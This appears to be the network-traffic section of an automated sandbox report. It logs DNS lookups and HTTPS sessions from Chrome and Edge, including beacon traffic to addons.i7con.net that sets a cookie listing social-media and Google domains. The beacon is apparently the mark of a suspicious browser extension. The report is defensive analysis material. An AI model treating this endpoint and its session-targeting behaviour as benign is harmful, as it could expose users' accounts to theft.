                                                                                                                                          Apr 12, 2024 09:16:48.841700077 CEST59074443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.418277025 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.418330908 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.418490887 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.418551922 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.787556887 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.871500969 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:40.872078896 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:40.872570992 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.912409067 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.956204891 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:40.956290960 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:40.956325054 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:40.956361055 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:40.956861019 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:40.956861019 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:41.040584087 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:41.040966034 CEST53511443192.168.2.5172.64.41.3
                                                                                                                                          Apr 12, 2024 09:17:41.125799894 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:41.126487017 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:41.126925945 CEST44353511172.64.41.3192.168.2.5
                                                                                                                                          Apr 12, 2024 09:17:41.131280899 CEST53511443192.168.2.5172.64.41.3

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Apr 12, 2024 09:14:38.361375093 CEST192.168.2.51.1.1.10x421bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:38.361571074 CEST192.168.2.51.1.1.10x6016Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:38.841854095 CEST192.168.2.51.1.1.10x1a45Standard query (0)addons.i7con.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:38.842577934 CEST192.168.2.51.1.1.10x23c4Standard query (0)addons.i7con.net65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:39.869710922 CEST192.168.2.51.1.1.10x855bStandard query (0)addons.i7con.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:39.869710922 CEST192.168.2.51.1.1.10x78baStandard query (0)addons.i7con.net65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:40.996339083 CEST192.168.2.51.1.1.10x7caaStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:40.996532917 CEST192.168.2.51.1.1.10xafdcStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:41.899054050 CEST192.168.2.51.1.1.10xc581Standard query (0)addons.i7con.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:42.055496931 CEST192.168.2.51.1.1.10x3148Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:42.056282043 CEST192.168.2.51.1.1.10x427cStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:44.078063965 CEST192.168.2.51.1.1.10x5493Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.510427952 CEST192.168.2.51.1.1.10x32f0Standard query (0)addons.i7con.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.510711908 CEST192.168.2.51.1.1.10x3f73Standard query (0)addons.i7con.net65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.729423046 CEST192.168.2.51.1.1.10xa084Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.804236889 CEST192.168.2.51.1.1.10x68abStandard query (0)addons.i7con.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.804553986 CEST192.168.2.51.1.1.10x60a0Standard query (0)addons.i7con.net65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.805221081 CEST192.168.2.51.1.1.10xa6a0Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.805221081 CEST192.168.2.51.1.1.10x6d8Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.868774891 CEST192.168.2.51.1.1.10xef58Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.869102955 CEST192.168.2.51.1.1.10x3ec2Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.869637012 CEST192.168.2.51.1.1.10x6778Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.869728088 CEST192.168.2.51.1.1.10xd70aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.887346983 CEST192.168.2.51.1.1.10xea8eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.887427092 CEST192.168.2.51.1.1.10xd5feStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.883373022 CEST192.168.2.51.1.1.10xb064Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.883620024 CEST192.168.2.51.1.1.10x39daStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.883826017 CEST192.168.2.51.1.1.10x2947Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.898058891 CEST192.168.2.51.1.1.10x14f8Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.898726940 CEST192.168.2.51.1.1.10x6d5dStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:47.091901064 CEST192.168.2.51.1.1.10xc705Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:47.092390060 CEST192.168.2.51.1.1.10xf15bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:48.106028080 CEST192.168.2.51.1.1.10x49c4Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:48.107019901 CEST192.168.2.51.1.1.10xe516Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:49.113475084 CEST192.168.2.51.1.1.10x467bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:51.772236109 CEST192.168.2.51.1.1.10x467bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:16:45.731148005 CEST192.168.2.51.1.1.10x1e94Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:16:45.731148005 CEST192.168.2.51.1.1.10xfab6Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Apr 12, 2024 09:14:38.444353104 CEST1.1.1.1192.168.2.50x421bNo error (0)www.google.com142.251.40.132A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:38.445149899 CEST1.1.1.1192.168.2.50x6016No error (0)www.google.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:41.139909983 CEST1.1.1.1192.168.2.50xcdf2No error (0)bingadsedgeextension-prod-eastus.azurewebsites.netssl.bingadsedgeextension-prod-eastus.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:41.139996052 CEST1.1.1.1192.168.2.50x1deeNo error (0)bingadsedgeextension-prod-eastus.azurewebsites.netssl.bingadsedgeextension-prod-eastus.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:41.139996052 CEST1.1.1.1192.168.2.50x1deeNo error (0)ssl.bingadsedgeextension-prod-eastus.azurewebsites.net40.71.99.188A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:41.986444950 CEST1.1.1.1192.168.2.50xc581No error (0)addons.i7con.net23.106.238.238A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:42.156250954 CEST1.1.1.1192.168.2.50x427cNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:44.192537069 CEST1.1.1.1192.168.2.50x5493No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.943645000 CEST1.1.1.1192.168.2.50x6d8No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:45.958844900 CEST1.1.1.1192.168.2.50x3ec2No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.976835966 CEST1.1.1.1192.168.2.50x39daNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.976835966 CEST1.1.1.1192.168.2.50x39daNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.976855993 CEST1.1.1.1192.168.2.50xb064No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.976855993 CEST1.1.1.1192.168.2.50xb064No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.976869106 CEST1.1.1.1192.168.2.50x2947No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.981152058 CEST1.1.1.1192.168.2.50x14f8No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.981152058 CEST1.1.1.1192.168.2.50x14f8No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:46.982162952 CEST1.1.1.1192.168.2.50x6d5dNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:48.189102888 CEST1.1.1.1192.168.2.50x49c4No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:48.189102888 CEST1.1.1.1192.168.2.50x49c4No error (0)googlehosted.l.googleusercontent.com142.251.40.97A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:14:48.191085100 CEST1.1.1.1192.168.2.50xe516No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:16:45.814393044 CEST1.1.1.1192.168.2.50xfab6No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:16:45.814464092 CEST1.1.1.1192.168.2.50x1e94No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                          Apr 12, 2024 09:16:45.814464092 CEST1.1.1.1192.168.2.50x1e94No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • www.google.com
                                                                                                                                          • addons.i7con.net
                                                                                                                                          • api.edgeoffer.microsoft.com
                                                                                                                                          • chrome.cloudflare-dns.com
                                                                                                                                          • clients2.googleusercontent.com
                                                                                                                                          • slscr.update.microsoft.com
                                                                                                                                          • edgeassetservice.azureedge.net
                                                                                                                                          • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                                                                          • login.live.com
                                                                                                                                          • deff.nelreports.net
                                                                                                                                          • fs.microsoft.com
                                                                                                                                          • bzib.nelreports.net

                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.549709142.251.40.1324431628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:38 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-04-12 07:14:39 UTC1703INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:39 GMT
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Expires: -1
                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-y5jJiiMyJwZ3JjeE-BGAOg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                          Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                          Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                          Server: gws
                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                          Accept-Ranges: none
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          2024-04-12 07:14:39 UTC817INData Raw: 33 32 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 76 69 63 74 6f 72 20 77 65 6d 62 61 6e 79 61 6d 61 20 6e 69 6b 65 20 73 68 6f 65 73 22 2c 22 72 69 76 69 61 6e 20 73 74 6f 63 6b 73 22 2c 22 74 65 6c 65 70 6f 72 74 20 61 6e 63 68 6f 72 69 6e 67 20 73 63 72 6f 6c 6c 20 6f 73 72 73 22 2c 22 69 6e 63 6f 6d 65 20 74 61 78 20 65 78 74 65 6e 73 69 6f 6e 22 2c 22 74 72 61 6e 73 66 6f 72 6d 65 72 73 20 67 69 20 6a 6f 65 20 63 72 6f 73 73 6f 76 65 72 20 6d 6f 76 69 65 22 2c 22 6e 63 61 20 63 6f 6c 6c 65 67 65 20 6e 61 74 69 6f 6e 61 6c 73 20 32 30 32 34 22 2c 22 62 72 69 64 67 65 72 74 6f 6e 20 73 65 61 73 6f 6e 20 33 20 74 72 61 69 6c 65 72 20 6e 65 74 66 6c 69 78 22 2c 22 68 65 6c 6c 64 69 76 65 72 73 20 77 61 72 62 6f 6e 64 20 64 65 6d 6f 63 72 61 74 69 63 20 64
                                                                                                                                          Data Ascii: 32a)]}'["",["victor wembanyama nike shoes","rivian stocks","teleport anchoring scroll osrs","income tax extension","transformers gi joe crossover movie","nca college nationals 2024","bridgerton season 3 trailer netflix","helldivers warbond democratic d
                                                                                                                                          2024-04-12 07:14:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.549707142.251.40.1324431628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:39 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                          Host: www.google.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.54972023.106.238.2384431628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:44 UTC373OUTGET /ext/analytic?do=init&from=Chrome1 HTTP/1.1
                                                                                                                                          Host: addons.i7con.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-04-12 07:14:45 UTC1207INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                          Date: Fri, 12 Apr 2024 07:12:04 GMT
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Expose-Headers: Penblock
                                                                                                                                          Block: 2
                                                                                                                                          Kenblock: enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Penblock: 2-enhjdmJubWFzZGZnaGprbHF3ZXJ0eXVpb3BaWENWQk5NQVNERkdISktMUVdFUlRZVUlPUDAxMjM0NTY3ODkrLz0=
                                                                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE
                                                                                                                                          Set-Cookie: gxid=6618dd2fd6255; expires=Mon, 12-Apr-2027 07:12:04 GMT; Max-Age=94608000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: installed=true; expires=Sat, 12-Apr-2025 07:12:04 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Set-Cookie: clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; expires=Sat, 12-Apr-2025 07:12:04 GMT; Max-Age=31536000; path=/; domain=.i7con.net; secure; SameSite=None
                                                                                                                                          Img-Error: undefined
                                                                                                                                          2024-04-12 07:14:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.549729104.118.8.139443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                          2024-04-12 07:14:46 UTC467INHTTP/1.1 200 OK
                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                          Server: ECAcc (chd/073D)
                                                                                                                                          X-CID: 11
                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                          X-Ms-Region: prod-eus-z1
                                                                                                                                          Cache-Control: public, max-age=258542
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:46 GMT
                                                                                                                                          Connection: close
                                                                                                                                          X-CID: 2


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.54973940.71.99.1884436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:46 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                          Host: api.edgeoffer.microsoft.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                          2024-04-12 07:14:46 UTC725INHTTP/1.1 200 OK
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:45 GMT
                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                          Set-Cookie: ARRAffinity=57ce21d97fedf6e7a31983f863eb16044385eb7392c1979f70cdbf8562df4fe4;Path=/;HttpOnly;Domain=api.edgeoffer.microsoft.com
                                                                                                                                          Set-Cookie: ARRAffinity=874c5298ae0e2eca12812a980102a414521df46497427d5bbed67654bd42654b;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                          Set-Cookie: ARRAffinitySameSite=874c5298ae0e2eca12812a980102a414521df46497427d5bbed67654bd42654b;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                          Request-Context: appId=cid-v1:cfede706-9043-4d8c-a950-efefc8624cae
                                                                                                                                          X-Powered-By: ASP.NET


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.549752162.159.61.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:47 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 128
                                                                                                                                          Accept: application/dns-message
                                                                                                                                          Accept-Language: *
                                                                                                                                          User-Agent: Chrome
                                                                                                                                          Accept-Encoding: identity
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          2024-04-12 07:14:47 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                          2024-04-12 07:14:47 UTC247INHTTP/1.1 200 OK
                                                                                                                                          Server: cloudflare
                                                                                                                                          Date: Fri, 12 Apr 2024 07:14:47 GMT
                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Content-Length: 468
                                                                                                                                          CF-RAY: 87316be619078c95-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-04-12 07:14:47 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 17 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.549750162.159.61.34436096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-04-12 07:14:47 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                          Connection: keep-alive
